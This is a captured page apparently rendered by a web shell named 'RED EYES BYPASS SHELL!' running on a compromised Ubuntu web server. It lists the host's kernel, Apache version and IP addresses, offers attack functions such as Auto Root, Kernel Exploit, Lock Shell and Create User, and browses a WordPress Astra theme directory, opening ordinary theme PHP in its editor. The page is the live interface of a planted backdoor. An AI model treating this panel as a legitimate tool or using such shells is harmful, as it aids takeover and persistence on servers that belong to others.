Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
astra /
inc /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
addons
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
blog
[ DIR ]
drwxr-xr-x
builder
[ DIR ]
drwxr-xr-x
compatibility
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
dynamic-css
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
metabox
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
theme-update
[ DIR ]
drwxr-xr-x
admin-functions.php
1.62
KB
-rwxr-xr-x
class-astra-after-setup-theme.php
11.13
KB
-rwxr-xr-x
class-astra-dynamic-css.php
299.14
KB
-rwxr-xr-x
class-astra-extended-base-dynamic-css.php
6.43
KB
-rwxr-xr-x
class-astra-global-palette.php
13.41
KB
-rwxr-xr-x
class-astra-loop.php
7.2
KB
-rwxr-xr-x
class-astra-memory-limit-notice.php
12.42
KB
-rwxr-xr-x
class-astra-mobile-header.php
5.78
KB
-rwxr-xr-x
extras.php
44.19
KB
-rwxr-xr-x
google-fonts.php
195.87
KB
-rwxr-xr-x
index.php
111
B
-rwxr-xr-x
markup-extras.php
72.17
KB
-rwxr-xr-x
template-parts.php
9.52
KB
-rwxr-xr-x
template-tags.php
1.11
KB
-rwxr-xr-x
w-org-version.php
647
B
-rwxr-xr-x
widgets.php
4.32
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin-functions.php
<?php /** * Admin functions - Functions that add some functionality to WordPress admin panel * * @package Astra * @since 1.0.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * Register menus */ if ( ! function_exists( 'astra_register_menu_locations' ) ) { /** * Register menus * * @since 1.0.0 */ function astra_register_menu_locations() { /** * Primary Menus */ register_nav_menus( array( 'primary' => esc_html__( 'Primary Menu', 'astra' ), ) ); if ( true === Astra_Builder_Helper::$is_header_footer_builder_active ) { /** * Register the Secondary & Mobile menus. */ register_nav_menus( array( 'secondary_menu' => esc_html__( 'Secondary Menu', 'astra' ), 'mobile_menu' => esc_html__( 'Off-Canvas Menu', 'astra' ), ) ); $component_limit = defined( 'ASTRA_EXT_VER' ) ? Astra_Builder_Helper::$component_limit : Astra_Builder_Helper::$num_of_header_menu; for ( $index = 3; $index <= $component_limit; $index++ ) { if ( ! is_customize_preview() && ! Astra_Builder_Helper::is_component_loaded( 'menu-' . $index ) ) { continue; } register_nav_menus( array( 'menu_' . $index => esc_html__( 'Menu ', 'astra' ) . $index, ) ); } /** * Register the Account menus. */ register_nav_menus( array( 'loggedin_account_menu' => esc_html__( 'Logged In Account Menu', 'astra' ), ) ); } /** * Footer Menus */ register_nav_menus( array( 'footer_menu' => esc_html__( 'Footer Menu', 'astra' ), ) ); } } add_action( 'init', 'astra_register_menu_locations' );
Close